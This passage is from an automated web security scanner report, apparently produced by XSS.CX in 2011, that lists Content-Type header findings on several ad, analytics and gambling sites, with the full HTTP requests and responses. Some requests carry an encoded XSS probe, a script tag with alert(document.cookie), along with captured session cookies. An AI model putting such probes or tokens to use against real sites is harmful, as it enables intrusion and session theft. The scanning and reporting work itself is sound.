In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/Metacafe/lists/metacafe/statuses.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=69500306433642497&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550177135=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2; original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPzA2vgvAToHaWQiJWJmNzU0NzkwYWZlMmZk%250AMDZhYTUxMTQyNzdkYWUyOTE4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e4fe7cf752483e5c3dbc1d51b7dbc81b4f38de89

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:50:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550202-60759-7402
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:50:02 GMT
X-RateLimit-Remaining: 107
X-Runtime: 0.03023
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: d1402f3982f2137670a644c4f3d02221f99884bf
X-RateLimit-Reset: 1305553776
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPzA2vgvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWJm%250ANzU0NzkwYWZlMmZkMDZhYTUxMTQyNzdkYWUyOTE4--4dc18f7bed0dbd2680bab894334a9a8d73dfd64f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 34

TWTR.Widget.receiveCallback_1([]);

26.2. http://in.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://in.getclicky.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:39:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

26.3. https://in.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://in.getclicky.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

26.4. http://neogames-tech.com/outbound/article/www.lga.org.mt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://neogames-tech.com
Path:	/outbound/article/www.lga.org.mt

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.5. http://rtb50.doubleverify.com/rtb.ashx/verifyc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rtb50.doubleverify.com
Path:	/rtb.ashx/verifyc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5384441&plc=62171182&sid=1037707&num=5&ver=2&dv_url=http%3A//ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&callback=__verify_callback_383465103788 HTTP/1.1
Host: rtb50.doubleverify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 16 May 2011 12:51:57 GMT
Connection: close
Content-Length: 33

__verify_callback_383465103788(2)

26.6. https://secure.neogames-tech.com/ScratchCards/images/seal_background.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/images/seal_background.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /ScratchCards/images/seal_background.png HTTP/1.1
Host: secure.neogames-tech.com
Connection: keep-alive
Referer: https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=1&CUR=GBP&LNG=~ENG&AFI=&MMI=0&CKI=&AR=&PAR=&RegistrationMode=PM&BO=FM&SDN=Scratch2Cash.com&__utma=-&__utmb=171482274.1.10.1305548356&__utmc=171482274&__utmx=-&__utmz=-&__utmv=-&__utmk=22205543
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; ASP.NET_SessionId=5p03ge55er42ijbnracipjyy

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/png
Last-Modified: Sun, 02 May 2010 11:59:30 GMT
Accept-Ranges: bytes
ETag: "eae5f8ebeee9ca1:1396"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:19:28 GMT

GIF89a..(................!.......,......(........-.
.;

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://server.iad.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=15712222 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.mundirasca.com/Home.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=15712222
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2736"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:46 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.8. http://trk.primescratchcards.com/w3c/p3p.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trk.primescratchcards.com
Path:	/w3c/p3p.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain HTML.

Request

Response

26.9. http://www.neogames.com/outbound/article/crazyscratch.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/crazyscratch.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.10. http://www.neogames.com/outbound/article/karamba.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/karamba.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.11. http://www.neogames.com/outbound/article/mundirasca.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/mundirasca.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.12. http://www.neogames.com/outbound/article/norgesloddet.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/norgesloddet.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.13. http://www.neogames.com/outbound/article/scratch.betsson.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/scratch.betsson.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.14. http://www.neogames.com/outbound/article/www.crazyscratch.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/www.crazyscratch.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.15. http://www.neogames.com/outbound/article/www.interwetten.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/www.interwetten.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.16. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/www.postcodelottery.co.uk

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.17. http://www.neogames.com/outbound/article/www.winnings.com previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neogames.com
Path:	/outbound/article/www.winnings.com

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.18. http://www.winnings.com/wp-admin/admin-ajax.php previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.winnings.com
Path:	/wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

27. Content type is not specified previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1703625 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:14 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:14 GMT
Pragma: no-cache
Content-Length: 4293
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

Report generated by XSS.CX at Mon May 16 08:24:05 CDT 2011.